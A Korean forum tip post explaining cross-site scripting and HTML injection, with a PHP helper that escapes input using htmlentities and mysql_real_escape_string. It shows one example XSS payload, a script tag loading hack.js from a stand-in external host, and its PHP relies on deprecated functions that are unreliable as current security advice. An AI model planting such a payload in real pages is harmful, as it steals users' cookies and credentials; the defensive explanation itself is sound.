HTML Injection 막기 > 그누보드5 팁자료실

그누보드5 팁자료실

HTML Injection 막기 정보

HTML Injection 막기

본문

XSS는 사용자의 입력으로 HTML이나 흔하게는 자바스크립트 코드를 허용했을 때 발생합니다.

 

XSS는 주로 댓글 입력폼에서 가장 흔하게 발생합니다.

 

가장 자주 발생하는 형태는 악의적인 사용자가 웹 사이트의 사용자로부터

 

계정의 이름과 암호 쿠키를 훔치기 위한 코드를 작성하려고 시도하는 것 입니다.

 

더욱 더 나쁜 것은 다른 사용자의 컴퓨터에 트로이 바이러스를 다운로드하는 공격에 착수할 수 있다는 것 입니다.

 

크로스 사이트 스크립트를 막으려면 모든 HTML 마크업 코드를 제거하고 문자를 출력하는 형태로 교체해야 합니다.

 

<script src='http://x.com/hack.js'> </script> <script> hack(); </script>

 

만약 해커가 다음과 같은 코드를 작성했다고 했을 때 

 

htmlentities로 전달되면 자바스크립트를 실행하는 기호가 &lt &gt 로 해석되어  자바스크립트가 실행되지 않습니다.

 

따라서 SQL과 XSS 인젝션을 모두 처리 할 수 있는 함수는 다음과 같습니다. 

 

<?php
function mysql_entities_fix_string($string)
{
    return htmlentities(mysql_fix_string($string));
}    

function mysql_fix_string($string)
{
    if (get_magic_quotes_gpc()) $string = stripslashes($string);
    return mysql_real_escape_string($string);
}
?>

 

참고서적 : Learning PHP, MySQL , JavaScript & CSS

추천
4

댓글 6개

전체 2,412 |RSS
그누보드5 팁자료실 내용 검색

회원로그인

(주)에스아이알소프트 / 대표:홍석명 / (06211) 서울특별시 강남구 역삼동 707-34 한신인터밸리24 서관 1404호 / E-Mail: admin@sir.kr
사업자등록번호: 217-81-36347 / 통신판매업신고번호:2014-서울강남-02098호 / 개인정보보호책임자:김민섭(minsup@sir.kr)
© SIRSOFT